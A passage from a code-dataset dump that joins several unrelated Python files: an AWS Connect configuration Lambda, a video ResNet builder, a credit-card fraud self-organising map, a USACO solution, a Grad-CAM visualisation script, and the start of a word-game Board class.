"NEXT_CONTACT_FLOW": "<CONTACT_FLOW_ID>",
"ROUTE_TO_AGENT_MESSAGE": "We will now route you to an agent."
}
'''
# Module-level AWS clients and table config: created once per container so
# they are reused across warm Lambda invocations.
ddb = boto3.resource('dynamodb')
tb_name = os.environ['ConfigTable']
translate = boto3.client('translate')
primary_key = os.environ['TablePrimaryKey']
sort_key = os.environ['TableSortKey']
table = ddb.Table(tb_name)
def parse_parameters(params, attributes):
    """Extract the routing inputs from a Connect contact-flow event.

    Args:
        params: the contact flow's ``Parameters`` dict.
        attributes: the contact's ``Attributes`` dict.

    Returns:
        (config_id, collection_id, language_code). The ids default to None.
        A ``LanguageCode`` parameter overrides the contact attribute, which in
        turn falls back to 'en'.
    """
    config_id = params.get("ConfigId")
    collection_id = params.get("CollectionId")
    language_code = params.get("LanguageCode",
                               attributes.get("LanguageCode", "en"))
    return config_id, collection_id, language_code
def add_new_language(collection_id, config_id, message_text, language_code):
    """Persist *message_text* on the config item under the *language_code* attribute.

    BUG FIX: the original interpolated the language code straight into the
    UpdateExpression ("SET {} = :t"). Codes such as 'zh-TW' contain '-' and
    make that expression invalid; an expression attribute name avoids the
    problem (and reserved-word clashes) entirely.
    """
    key = {
        primary_key: collection_id,
        sort_key: config_id
    }
    table.update_item(
        Key=key,
        UpdateExpression="SET #lang = :t",
        ExpressionAttributeNames={"#lang": language_code},
        ExpressionAttributeValues={":t": message_text}
    )
    return
def translate_and_update(collection_id, config_id, message_text, language_code):
    """Translate English *message_text* to *language_code*, cache the result on
    the config item, and return (text, effective_language_code).

    Falls back to the untranslated English text on any failure so the contact
    flow always gets a usable prompt.
    """
    try:
        if language_code == "en":
            # Nothing to translate; still cache under 'en' for future lookups.
            add_new_language(collection_id, config_id, message_text, language_code)
            return message_text, 'en'
        resp = translate.translate_text(
            Text=message_text,
            SourceLanguageCode='en',
            TargetLanguageCode=language_code
        )
        translated_text = resp['TranslatedText']
        add_new_language(collection_id, config_id, translated_text, language_code)
        return translated_text, language_code
    except Exception as e:
        # Narrowed from a bare `except:` (which also swallowed SystemExit and
        # KeyboardInterrupt) and logged so failures are visible in CloudWatch;
        # the best-effort English fallback is intentional.
        print(e)
        return message_text, 'en'
def get_configs(collection_id, config_id=None):
    """Fetch config items for a collection from DynamoDB.

    With config_id=None, returns every item in the collection; otherwise a
    one-element list with that item, or [] if it does not exist.
    """
    configs = []
    if config_id is None:
        # CONSISTENCY FIX: use the configured primary-key name, as the get_item
        # branch below does (the original hardcoded 'CollectionId' here).
        resp = table.query(
            KeyConditionExpression=Key(primary_key).eq(collection_id)
        )
        # NOTE(review): results beyond one query page (LastEvaluatedKey) are
        # not followed — acceptable while collections stay small; confirm.
        configs.extend(resp.get("Items", []))
    else:
        key = {
            primary_key: collection_id,
            sort_key: config_id
        }
        resp = table.get_item(
            Key=key
        )
        if "Item" in resp:
            configs.append(resp["Item"])
    return configs
def process_configs(collection_id, raw_configs, language_code):
    """Turn raw DynamoDB config items into the flat string map Connect expects.

    STATIC_ROUTING items always return their default; LANGUAGE_ROUTING items
    return the per-language value (seeding the untranslated default when the
    language attribute is missing); MESSAGE items are machine-translated and
    cached on first use for a new language.
    """
    response = {
        "SUCCESS": "TRUE"
    }
    for conf in raw_configs:
        config_id = conf["ConfigId"]
        if conf["ConfigType"] == "STATIC_ROUTING":
            response[config_id] = conf["DefaultResponse"]
        elif conf["ConfigType"] == "LANGUAGE_ROUTING":
            if language_code in conf:
                response[config_id] = conf[language_code]
            else:
                # Seed the missing language with the (untranslated) default.
                add_new_language(collection_id, config_id, conf["DefaultResponse"], language_code)
                response[config_id] = conf["DefaultResponse"]
        elif conf["ConfigType"] == "MESSAGE":
            if language_code in conf:
                response[config_id] = conf[language_code]
            else:
                # NOTE(review): translate_and_update may fall back to English and
                # this line then *reassigns* language_code, changing how the
                # remaining configs in the loop are resolved — confirm intended.
                response_text, language_code = translate_and_update(collection_id, config_id, conf['DefaultResponse'], language_code)
                response[config_id] = response_text
    return response
def default_response():
    """Failure payload returned to the contact flow when the lookup cannot proceed."""
    return {"SUCCESS": "FALSE"}
def lambda_handler(event, context):
    """Lambda entry point for the Connect get-config invocation.

    Never raises: any failure is logged and mapped to {"SUCCESS": "FALSE"} so
    the contact flow can branch on the error instead of failing the call.
    """
    try:
        config_id, collection_id, language_code = parse_parameters(event["Details"]["Parameters"], event["Details"]["ContactData"]["Attributes"])
        if config_id is None and collection_id is None:
            return default_response()
        raw_configs = get_configs(collection_id, config_id)
        if len(raw_configs) == 0:
            return default_response()
        return process_configs(collection_id, raw_configs, language_code)
    except Exception as e:
        print(e)
        return default_response()
| true |
d59983e808d95f795d7eea3c1bda105d6472032a | Python | sripathisridhar/acav100m | /evaluation/code/models/video_model_builder.py | UTF-8 | 8,544 | 2.515625 | 3 | [
"MIT"
] | permissive | """Visual Conv models."""
import torch
import torch.nn as nn
import math
from models import head_helper, resnet_helper, stem_helper
from models.build import MODEL_REGISTRY
# Number of blocks for different stages given the model depth.
_MODEL_STAGE_DEPTH = {18: (2, 2, 2, 2), 34: (3, 4, 6, 3), 50: (3, 4, 6, 3), 101: (3, 4, 23, 3)}
# Basis of temporal kernel sizes for each of the stage.
_TEMPORAL_KERNEL_BASIS = {
"resnet": [
[[5]], # conv1 temporal kernel.
[[1]], # res2 temporal kernel.
[[1]], # res3 temporal kernel.
[[3]], # res4 temporal kernel.
[[3]], # res5 temporal kernel.
],
}
_POOL1 = {
"resnet": [[1, 1, 1]],
}
@MODEL_REGISTRY.register()
class ResNet(nn.Module):
    """
    ResNet model builder. It builds a ResNet like network backbone for video
    input: stem -> res2..res5 residual stages -> global pooling head.
    """

    def __init__(self, cfg):
        """
        Args:
            cfg (CfgNode): model building configs, details are in the
                comments of the config file.
        """
        super(ResNet, self).__init__()
        # Single-pathway backbone (no SlowFast-style second pathway).
        self.num_pathways = 1
        self._construct_network(cfg)

    def _compute_dim_in(
        self,
        idx,
        trans_func,
        width_per_group,
    ):
        """
        Compute the input dimension of convolutional stage *idx*.
        args:
            idx (int): the index of the convolutional stage (0 == res2).
            trans_func (string): transform function to be used to construct each
                ResBlock ('basic_transform' or 'bottleneck_transform').
            width_per_group (int): width of each group.
        returns:
            dim_in (list): list containing the input dimension.
        """
        if trans_func == 'basic_transform':
            # Basic blocks have no channel expansion; widths double per stage.
            factor = 1 if idx == 0 else 2 ** (idx - 1)
        elif trans_func == 'bottleneck_transform':
            # Bottleneck blocks expand 4x, so the previous stage's output is
            # width * 4 * 2**(idx-1) == width * 2 * 2**idx.
            factor = 1 if idx == 0 else 2 * (2 ** idx)
        else:
            raise NotImplementedError(
                "Does not support {} transformation".format(trans_func)
            )
        dim_in = [width_per_group * factor]
        return dim_in

    def _compute_dim_out(
        self,
        idx,
        trans_func,
        width_per_group,
    ):
        """
        Compute the output dimension of convolutional stage *idx*.
        (Arguments as in _compute_dim_in.)
        """
        if trans_func == 'basic_transform':
            factor = 2 ** idx
        elif trans_func == 'bottleneck_transform':
            factor = 4 * (2 ** idx)
        else:
            raise NotImplementedError(
                "Does not support {} transformation".format(trans_func)
            )
        dim_out = [width_per_group * factor]
        return dim_out

    def _construct_network(self, cfg):
        """
        Builds the stem, the four residual stages and the pooling head.
        Args:
            cfg (CfgNode): model building configs, details are in the
                comments of the config file.
        """
        assert cfg.VIS.ARCH in _POOL1.keys()
        pool_size = _POOL1[cfg.VIS.ARCH]
        assert len({len(pool_size), self.num_pathways}) == 1
        assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
        # Blocks per residual stage for the requested depth.
        (d2, d3, d4, d5) = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
        num_groups = cfg.RESNET.NUM_GROUPS
        width_per_group = cfg.RESNET.WIDTH_PER_GROUP
        dim_inner = num_groups * width_per_group
        temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.VIS.ARCH]

        # Stem: stride-2 conv in T, H and W over the raw input.
        self.s1 = stem_helper.VideoModelStem(
            dim_in=cfg.DATA.INPUT_CHANNEL_NUM,
            dim_out=[width_per_group],
            kernel=[temp_kernel[0][0] + [7, 7]],
            stride=[[2, 2, 2]],
            padding=[[temp_kernel[0][0][0] // 2, 3, 3]],
            eps=cfg.MODEL.EPSILON,
            bn_mmt=cfg.MODEL.MOMENTUM,
        )
        # Per-stage input/output widths implied by the transform function.
        dim_in_l = [
            self._compute_dim_in(i, cfg.RESNET.TRANS_FUNC, width_per_group)
            for i in range(4)
        ]
        dim_out_l = [
            self._compute_dim_out(i, cfg.RESNET.TRANS_FUNC, width_per_group)
            for i in range(4)
        ]
        self.s2 = resnet_helper.ResStage(
            dim_in=dim_in_l[0],
            dim_out=dim_out_l[0],
            dim_inner=[dim_inner],
            temp_kernel_sizes=temp_kernel[1],
            stride=cfg.RESNET.SPATIAL_STRIDES[0],
            num_blocks=[d2],
            num_groups=[num_groups],
            num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0],
            trans_func_name=cfg.RESNET.TRANS_FUNC,
            stride_1x1=cfg.RESNET.STRIDE_1X1,
            inplace_relu=cfg.RESNET.INPLACE_RELU,
            dilation=cfg.RESNET.SPATIAL_DILATIONS[0],
            eps=cfg.MODEL.EPSILON,
            bn_mmt=cfg.MODEL.MOMENTUM,
        )
        # Max-pool between res2 and res3, registered once per pathway.
        for pathway in range(self.num_pathways):
            pool = nn.MaxPool3d(
                kernel_size=pool_size[pathway],
                stride=pool_size[pathway],
                padding=[0, 0, 0],
            )
            self.add_module("pathway{}_pool".format(pathway), pool)
        self.s3 = resnet_helper.ResStage(
            dim_in=dim_in_l[1],
            dim_out=dim_out_l[1],
            dim_inner=[dim_inner * 2],
            temp_kernel_sizes=temp_kernel[2],
            stride=cfg.RESNET.SPATIAL_STRIDES[1],
            num_blocks=[d3],
            num_groups=[num_groups],
            num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1],
            trans_func_name=cfg.RESNET.TRANS_FUNC,
            stride_1x1=cfg.RESNET.STRIDE_1X1,
            inplace_relu=cfg.RESNET.INPLACE_RELU,
            dilation=cfg.RESNET.SPATIAL_DILATIONS[1],
            eps=cfg.MODEL.EPSILON,
            bn_mmt=cfg.MODEL.MOMENTUM,
        )
        self.s4 = resnet_helper.ResStage(
            dim_in=dim_in_l[2],
            dim_out=dim_out_l[2],
            dim_inner=[dim_inner * 4],
            temp_kernel_sizes=temp_kernel[3],
            stride=cfg.RESNET.SPATIAL_STRIDES[2],
            num_blocks=[d4],
            num_groups=[num_groups],
            num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2],
            trans_func_name=cfg.RESNET.TRANS_FUNC,
            stride_1x1=cfg.RESNET.STRIDE_1X1,
            inplace_relu=cfg.RESNET.INPLACE_RELU,
            dilation=cfg.RESNET.SPATIAL_DILATIONS[2],
            eps=cfg.MODEL.EPSILON,
            bn_mmt=cfg.MODEL.MOMENTUM,
        )
        self.s5 = resnet_helper.ResStage(
            dim_in=dim_in_l[3],
            dim_out=dim_out_l[3],
            dim_inner=[dim_inner * 8],
            temp_kernel_sizes=temp_kernel[4],
            stride=cfg.RESNET.SPATIAL_STRIDES[3],
            num_blocks=[d5],
            num_groups=[num_groups],
            num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3],
            trans_func_name=cfg.RESNET.TRANS_FUNC,
            stride_1x1=cfg.RESNET.STRIDE_1X1,
            inplace_relu=cfg.RESNET.INPLACE_RELU,
            dilation=cfg.RESNET.SPATIAL_DILATIONS[3],
            eps=cfg.MODEL.EPSILON,
            bn_mmt=cfg.MODEL.MOMENTUM,
        )
        # The stem halves T; the head pools over everything that remains
        # (spatial size is the 32x-downsampled crop).
        _num_frames = cfg.DATA.NUM_FRAMES // 2
        self.head = head_helper.ResNetPoolingHead(
            dim_in=dim_out_l[3],
            pool_size=[
                [
                    _num_frames // pool_size[0][0],
                    math.ceil(cfg.DATA.CROP_SIZE / 32) // pool_size[0][1],
                    math.ceil(cfg.DATA.CROP_SIZE / 32) // pool_size[0][2],
                ]
            ],
        )
        # Flattened feature width exposed to downstream consumers.
        self.output_size = sum(dim_out_l[3])

    def get_feature_map(self, x):
        """Run the backbone (stem + residual stages) and return the per-pathway
        feature maps, without applying the pooling head."""
        x = self.s1(x)
        x = self.s2(x)
        for pathway in range(self.num_pathways):
            pool = getattr(self, "pathway{}_pool".format(pathway))
            x[pathway] = pool(x[pathway])
        x = self.s3(x)
        x = self.s4(x)
        x = self.s5(x)
        return x

    def get_logit(self, feature_map):
        """Apply the global pooling head to a backbone feature map."""
        return self.head(feature_map)

    def forward(self, x):
        # Previously duplicated the whole backbone inline; delegating to the
        # two helpers keeps the three entry points from drifting apart.
        return self.get_logit(self.get_feature_map(x))
| true |
616262c4788f287bdf469ff77461ef5dbcca0150 | Python | surajdidwania/Deep-Learning-Projects | /Self_Organizing_Maps/somdp.py | UTF-8 | 1,020 | 2.9375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# BUG FIX: MiniSom was used below without ever being imported (NameError at
# runtime); the script has always depended on the `minisom` package.
from minisom import MiniSom

# Importing the dataset
dataset = pd.read_csv('Credit_Card_Applications.csv')
X = dataset.iloc[:,:-1].values
y = dataset.iloc[:,-1].values

# Feature scaling to [0, 1] — SOMs are distance based, so scaling matters.
from sklearn.preprocessing import StandardScaler,MinMaxScaler
sc = MinMaxScaler(feature_range=(0, 1))
X = sc.fit_transform(X)

# Train a 10x10 self-organising map on the 15 scaled features.
som = MiniSom(10, 10, 15, sigma=1.0, learning_rate=0.5)
som.random_weights_init(X)
som.train_random(X, 100)

# Visualising results: dark cells are close to their neighbours, light cells
# are outliers (potential frauds).
from pylab import bone,pcolor,colorbar,plot,show
bone()
pcolor(som.distance_map().T)
colorbar()
markers = ['o', 's']
colors = ['r', 'g']
for i, x in enumerate(X):
    w = som.winner(x)
    plot(w[0] + 0.5, w[1] + 0.5, markers[y[i]],
         markeredgecolor=colors[y[i]], markerfacecolor='None',
         markersize=10, markeredgewidth=2)
show()

# Finding the frauds: customers mapped to the outlying cells.
# NOTE(review): the winning cells (7,7)/(6,6) are specific to one trained map
# and must be re-read from the plot after each training run.
mappings = som.win_map(X)
fraud = np.concatenate((mappings[(7, 7)], mappings[(6, 6)]), axis=0)
fraud = sc.inverse_transform(fraud) | true |
f51257a9a215d76c1640e21da4734ce9ce61b14c | Python | zhbngchen/USACO | /contest/herding.py | UTF-8 | 459 | 2.96875 | 3 | [] | no_license | fin = open("herding.in", 'r')
fout = open("herding.out", 'w')
# Three cow positions a < b < c on a number line (fin is opened on the line above).
a, b, c = map(int, fin.readline().split())
# Gap sizes between neighbouring cows.
distAB = b - a
distBC = c - b
if distAB == 1 and distBC ==1:
    # Already three consecutive positions: no moves needed.
    best = 0
    worst = 0
else:
    if distAB == 2 or distBC == 2:
        # A gap of exactly 2: one end cow can jump straight into the hole.
        best = 1
    else:
        best = 2
    # Worst case: walk an end cow across the larger gap one step at a time.
    if distAB < distBC:
        maxDist = distBC
    else:
        maxDist = distAB
    worst = maxDist - 1
fout.write(str(best) + '\n')
fout.write(str(worst) + '\n')
# NOTE(review): fin is never closed; harmless for a short contest script.
fout.close()
| true |
541f2f0e47018eb50e9dbb0308c86312252dc465 | Python | trevbhatt/bengali | /grad-cam.py | UTF-8 | 13,684 | 2.640625 | 3 | [] | no_license | '''Command to run:
python grad-cam.py --image-path 'sample_4.pickle' --use-cuda --model 'storage/models/consonant_diacritic.pth' --label 'label_4_vowel.pickle'
'''
import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models
import torch.nn as nn
import torch.nn.functional as F
import pickle
class FeatureExtractor():
    """Runs a model's top-level submodules in order, collecting the activations
    of the requested target layers and hooking them so their gradients are
    recorded during the backward pass."""

    def __init__(self, model, target_layers):
        self.model = model
        self.target_layers = target_layers
        self.gradients = []

    def save_gradient(self, grad):
        # Backward hook: gradients arrive in reverse layer order.
        self.gradients.append(grad)

    def __call__(self, x):
        self.gradients = []
        captured = []
        for name, module in self.model._modules.items():
            x = module(x)
            if name not in self.target_layers:
                continue
            x.register_hook(self.save_gradient)
            captured.append(x)
        return captured, x
class ModelOutputs():
    """Thin wrapper around FeatureExtractor: a forward pass yields the network
    output plus the activations of the targeted intermediate layers; the hooked
    gradients are available afterwards via get_gradients()."""

    def __init__(self, model, target_layers):
        self.model = model
        self.feature_extractor = FeatureExtractor(self.model, target_layers)

    def get_gradients(self):
        return self.feature_extractor.gradients

    def __call__(self, x):
        # The extractor already returns the final activation as the output;
        # no extra classifier head is applied here.
        activations, output = self.feature_extractor(x)
        return activations, output
def preprocess_image(img):
    """Convert an HxWx3 float BGR image into a normalized, gradient-tracking
    1x3xHxW torch tensor (BGR -> RGB, ImageNet mean/std per channel)."""
    imagenet_means = [0.485, 0.456, 0.406]
    imagenet_stds = [0.229, 0.224, 0.225]
    # Reverse the channel axis: OpenCV loads BGR, the network expects RGB.
    rgb = img.copy()[:, :, ::-1]
    for channel in range(3):
        rgb[:, :, channel] = rgb[:, :, channel] - imagenet_means[channel]
        rgb[:, :, channel] = rgb[:, :, channel] / imagenet_stds[channel]
    # HWC -> CHW, made contiguous so torch.from_numpy accepts it.
    chw = np.ascontiguousarray(np.transpose(rgb, (2, 0, 1)))
    tensor = torch.from_numpy(chw)
    tensor.unsqueeze_(0)
    return tensor.requires_grad_(True)
def show_cam_on_image(img, mask, pred_index, prefix):
    """Overlay *mask* (a 0..1 CAM) on *img* (0..1 float BGR) as a JET heatmap
    and write the blend to <prefix>_<pred_index>_cam.jpg."""
    heatmap = np.float32(cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)) / 255
    blended = heatmap + np.float32(img)
    blended = blended / np.max(blended)
    cv2.imwrite(f"{prefix}_{pred_index}_cam.jpg", np.uint8(255 * blended))
class GradCam:
    """Grad-CAM: weight the target layer's activations by the spatially-averaged
    gradients of a chosen class score, producing a class-discriminative heatmap.
    """

    def __init__(self, model, target_layer_names, use_cuda):
        self.model = model
        self.model.eval()
        self.cuda = use_cuda
        if self.cuda:
            self.model = model.cuda()
        self.extractor = ModelOutputs(self.model, target_layer_names)

    def forward(self, input):
        # Plain forward pass without recording target-layer activations.
        return self.model(input)

    def __call__(self, input, index=None):
        """Return (cam, index): a 136x136 float heatmap in [0, 1] for class
        *index* (or for the top-scoring class when index is None)."""
        if self.cuda:
            features, output = self.extractor(input.cuda())
        else:
            features, output = self.extractor(input)
        if index == None:
            index = np.argmax(output.cpu().data.numpy())
        # One-hot select the class score so backward() yields d(score)/d(activations).
        one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
        one_hot[0][index] = 1
        one_hot = torch.from_numpy(one_hot).requires_grad_(True)
        if self.cuda:
            one_hot = torch.sum(one_hot.cuda() * output)
        else:
            one_hot = torch.sum(one_hot * output)
        # self.model.features.zero_grad()
        # self.model.classifier.zero_grad()
        one_hot.backward(retain_graph=True)
        # Last hooked gradient corresponds to the last targeted layer.
        grads_val = self.extractor.get_gradients()[-1].cpu().data.numpy()
        target = features[-1]
        target = target.cpu().data.numpy()[0, :]
        # Grad-CAM channel weights: global average of the gradients over H, W.
        weights = np.mean(grads_val, axis=(2, 3))[0, :]
        cam = np.zeros(target.shape[1:], dtype=np.float32)
        for i, w in enumerate(weights):
            cam += w * target[i, :, :]
        # ReLU, resize to the network's input resolution, then min-max normalize.
        # NOTE(review): 136x136 is hardcoded to this project's input size, and
        # the division below yields NaNs if cam is all zeros — confirm acceptable.
        cam = np.maximum(cam, 0)
        cam = cv2.resize(cam, (136, 136)) # changed from (224, 224)
        cam = cam - np.min(cam)
        cam = cam / np.max(cam)
        return cam, index
class GuidedBackpropReLU(Function):
    """Custom autograd ReLU for guided backpropagation: the backward pass lets
    a gradient through only where BOTH the forward input and the incoming
    gradient are positive."""

    @staticmethod
    def forward(self, input):
        # Standard ReLU, written as input * (input > 0).
        positive_mask = (input > 0).type_as(input)
        output = torch.addcmul(torch.zeros(input.size()).type_as(input), input, positive_mask)
        self.save_for_backward(input, output)
        return output

    @staticmethod
    def backward(self, grad_output):
        input, output = self.saved_tensors
        grad_input = None
        # Masks: where the forward input was positive / the gradient is positive.
        positive_mask_1 = (input > 0).type_as(grad_output)
        positive_mask_2 = (grad_output > 0).type_as(grad_output)
        # grad_input = grad_output * mask1 * mask2, built via two addcmul calls.
        grad_input = torch.addcmul(torch.zeros(input.size()).type_as(input),
                                   torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output,
                                                 positive_mask_1), positive_mask_2)
        return grad_input
class GuidedBackpropReLUModel:
    """Wraps a model with its ReLUs swapped for GuidedBackpropReLU, then computes
    the guided-backprop input gradient for a chosen class score."""

    def __init__(self, model, use_cuda):
        self.model = model
        self.model.eval()
        self.cuda = use_cuda
        if self.cuda:
            self.model = model.cuda()

        # replace ReLU with GuidedBackpropReLU
        # NOTE(review): only top-level submodules are inspected; ReLUs nested
        # inside containers (e.g. Sequential) are not replaced — confirm the
        # target models only use top-level ReLU modules.
        for idx, module in self.model._modules.items():
            if module.__class__.__name__ == 'ReLU':
                self.model._modules[idx] = GuidedBackpropReLU.apply

    def forward(self, input):
        return self.model(input)

    def __call__(self, input, index=None):
        """Return the guided-backprop gradient of class *index* (default: the
        top-scoring class) w.r.t. *input*, as a CxHxW numpy array."""
        if self.cuda:
            output = self.forward(input.cuda())
        else:
            output = self.forward(input)

        if index == None:
            index = np.argmax(output.cpu().data.numpy())

        # One-hot select the class score, then backprop it to the input.
        one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
        one_hot[0][index] = 1
        one_hot = torch.from_numpy(one_hot).requires_grad_(True)
        if self.cuda:
            one_hot = torch.sum(one_hot.cuda() * output)
        else:
            one_hot = torch.sum(one_hot * output)

        # self.model.features.zero_grad()
        # self.model.classifier.zero_grad()
        one_hot.backward(retain_graph=True)

        # Requires *input* to have been created with requires_grad_(True).
        output = input.grad.cpu().data.numpy()
        output = output[0, :, :, :]

        return output
def get_args():
    """Parse command-line arguments; --use-cuda is honoured only when a CUDA
    device is actually available."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--use-cuda', action='store_true', default=False,
                        help='Use NVIDIA GPU acceleration')
    parser.add_argument('--image-path', type=str, default='./examples/both.png',
                        help='Input image path')
    parser.add_argument('--model', type=str)
    parser.add_argument('--label', type=str)
    parser.add_argument('--prefix', type=str)
    args = parser.parse_args()

    args.use_cuda = args.use_cuda and torch.cuda.is_available()
    message = "Using GPU for acceleration" if args.use_cuda else "Using CPU for computation"
    print(message)
    return args
def deprocess_image(img):
    """ see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
    # Standardize, compress to +/-0.1 around 0.5, clip to [0, 1], scale to bytes.
    centered = (img - np.mean(img)) / (np.std(img) + 1e-5)
    shifted = centered * 0.1 + 0.5
    return np.uint8(np.clip(shifted, 0, 1) * 255)
# Define a flatten class to be picked up by the
class Flatten(nn.Module):
    """Collapses every dimension after the batch dimension into one."""

    def forward(self, input):
        batch = input.size(0)
        return input.view(batch, -1)
class Net(nn.Module):
    """Small CNN: two conv+maxpool stages followed by three fully connected
    layers; the 168-way output matches the Bengali grapheme-root class count.

    NOTE(review): relies on the module-level helper ``output_size()`` and the
    constant ``img_resize`` defined elsewhere in this file — confirm they are
    in scope before the class body executes.
    """
    def __init__(self):
        super(Net, self).__init__()
        # Define the Parameters for the neural network
        # see if neutron can help visualize my network
        # Look at fast ai tutorials for CNN
        # Convolution layer 1
        self.conv1_input_channels = 1
        self.conv1_kernel_size = 9
        self.conv1_stride = 1
        self.conv1_output_channels = 16
        self.conv1_output_dim = output_size(img_resize,
                                            self.conv1_kernel_size,
                                            self.conv1_stride)
        # Pooling layer 1
        self.pool1_kernel_size = 11
        self.pool1_stride = 2
        self.pool1_output_dim = output_size(self.conv1_output_dim,
                                            self.pool1_kernel_size,
                                            self.pool1_stride)
        #conv 2
        self.conv2_input_channels = self.conv1_output_channels
        self.conv2_kernel_size = 8
        self.conv2_stride = 1
        self.conv2_output_channels = 32
        self.conv2_output_dim = output_size(self.pool1_output_dim,
                                            self.conv2_kernel_size,
                                            self.conv2_stride)
        # Pooling layer 2
        self.pool2_kernel_size = 8
        self.pool2_stride = 2
        self.pool2_output_dim = output_size(self.conv2_output_dim,
                                            self.pool2_kernel_size,
                                            self.pool2_stride)
        # Fully connected 1 (input is batch_size x height x width after pooling)
        self.fc1_input_features = self.conv2_output_channels * self.pool2_output_dim**2
        self.fc1_output_features = 256
        # Fully connected 2
        self.fc2_input_features = self.fc1_output_features
        self.fc2_output_features = 200
        # Fully Connected 3 (output is number of features)
        self.fc3_input_features = self.fc2_output_features
        self.fc3_output_features = 168
        # Create the layers
        self.conv1 = nn.Conv2d(self.conv1_input_channels,
                               self.conv1_output_channels,
                               self.conv1_kernel_size,
                               stride=self.conv1_stride)
        self.max_pool1 = nn.MaxPool2d(self.pool1_kernel_size, self.pool1_stride)
        self.conv2 = nn.Conv2d(self.conv2_input_channels,
                               self.conv2_output_channels,
                               self.conv2_kernel_size,
                               stride=self.conv2_stride)
        self.max_pool2 = nn.MaxPool2d(self.pool2_kernel_size, self.pool2_stride)
        self.flatten = Flatten()
        self.fc1 = nn.Linear(self.fc1_input_features, self.fc1_output_features)
        self.fc2 = nn.Linear(self.fc2_input_features, self.fc2_output_features)
        self.fc3 = nn.Linear(self.fc3_input_features, self.fc3_output_features)
        # Flat list of weight layers (used by code that inspects .features).
        self.features = [self.conv1, self.conv2, self.fc1, self.fc2, self.fc3]
    def forward(self, x):
        # run the tensor through the layers
        x = F.relu(self.conv1(x))
        x = self.max_pool1(x)
        x = F.relu(self.conv2(x))
        x = self.max_pool2(x)
        x = self.flatten(x)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = self.fc3(x)
        return x
    def num_flat_features(self, x):
        # number of flat features to determine the size of the first fully connected layer
        size = x.size()[1:]
        num_features = 1
        for s in size:
            num_features *= s
        return num_features
# Define a features attribute
def copy_bw_to_rgb(input_image):
    """Copy a single-channel torch image to the CPU and expand it to 3 RGB channels.

    Returns a numpy array of shape (..., 3) suitable for plotting.
    """
    from copy import deepcopy
    # Work on a detached CPU copy so plotting never touches the original
    # (possibly GPU-resident) tensor.
    gray = np.squeeze(deepcopy(input_image).cpu().numpy())
    # Replicate the grayscale plane into the last axis to fake RGB.
    return np.stack((gray, gray, gray), axis=-1)
if __name__ == '__main__':
    """ python grad_cam.py <path_to_image>
    1. Loads an image with opencv.
    2. Preprocesses it for VGG19 and converts to a pytorch variable.
    3. Makes a forward pass to find the category index with the highest score,
    and computes intermediate activations.
    Makes the visualization. """
    args = get_args()
    # Import model
    model = torch.load(args.model)
    # Import label
    with open(args.label, 'rb') as f:
        # BUG FIX: np.asscalar was deprecated in NumPy 1.16 and removed in
        # 1.23; ndarray.item() is the supported equivalent.
        label = pickle.load(f).cpu().numpy().item()
    # Can work with any model, but it assumes that the model has a
    # feature method, and a classifier method,
    # as in the VGG models in torchvision.
    grad_cam = GradCam(model=model, \
                       target_layer_names=['conv1', 'conv2'], use_cuda=args.use_cuda)
    # Load our own pickled input image (renamed from `input`, which shadowed
    # the builtin) and push it to the GPU.
    with open(args.image_path, 'rb') as f:
        input_tensor = torch.Tensor(pickle.load(f)).to(torch.device('cuda:0'))
    # Reshape to the (batch, channel, height, width) layout the model expects.
    input_tensor = input_tensor.reshape((1, 1, 136, 136))
    # Post-process the input into an RGB numpy image for overlay plotting.
    img = copy_bw_to_rgb(input_tensor)
    # Turn on gradient tracking for the input so Grad-CAM can backprop to it.
    input_tensor = input_tensor.requires_grad_(True)
    # If None, grad_cam returns the map for the highest scoring category;
    # otherwise it targets the requested index.
    target_index = label
    mask, pred_index = grad_cam(input_tensor, target_index)
    show_cam_on_image(img, mask, pred_index, args.prefix)
    # Guided backpropagation visualization, plus its combination with the CAM.
    gb_model = GuidedBackpropReLUModel(model=model, use_cuda=args.use_cuda)
    gb = gb_model(input_tensor, index=target_index)
    gb = gb.transpose((1, 2, 0))
    cam_mask = cv2.merge([mask, mask, mask])
    cam_gb = deprocess_image(cam_mask*gb)
    gb = deprocess_image(gb)
    cv2.imwrite(f'{args.prefix}_{pred_index}_gb.jpg', gb)
    cv2.imwrite(f'{args.prefix}_{pred_index}_cam_gb.jpg', cam_gb)
b6e99339bac4a56aeb175a5dabe3b009751c5abd | Python | infantinoalex/AI-Final-Project | /Source/Board.py | UTF-8 | 12,169 | 3.6875 | 4 | [] | no_license | """
Contains the Board class
The Board is the place where all the tiles are played; it starts off empty, and
then holds every word which gets played throughout the game
"""
import numpy as np
from Tile import Tile
from Anchor import Anchor
from Word import Word
from Words import Words
class Board :
    """The place where all the tiles are played.

    A Board is a size x size grid of Tile objects (blank when empty) plus a
    list of Anchors -- the squares through which a new word may legally be
    attached.  The board starts empty with a single default Anchor for the
    opening play.
    """

    def __init__(self) :
        # 21x21 grid of blank tiles, indexed board[x, y].
        self.size = 21
        self.board = np.empty([self.size, self.size], dtype=Tile)
        # A single default (blank) anchor allows the first word anywhere.
        self.anchors = [Anchor()]
        for i in range(self.size) :
            for j in range(self.size) :
                self.board[i, j] = Tile()

    def GetBoard(self) :
        """Return the underlying numpy grid of Tiles."""
        return self.board

    def GetAnchors(self) :
        """Return the current list of legal attachment points."""
        return self.anchors

    def PlaceTile(self, tile, hand, xPos, yPos, playDirection) :
        """Place one tile at (xPos, yPos), consuming it from *hand*.

        When the board already holds the same letter there (the anchor square
        of the word being played), the existing tile is reused and nothing is
        removed from the hand.
        """
        tileLetter = tile.GetLetter()
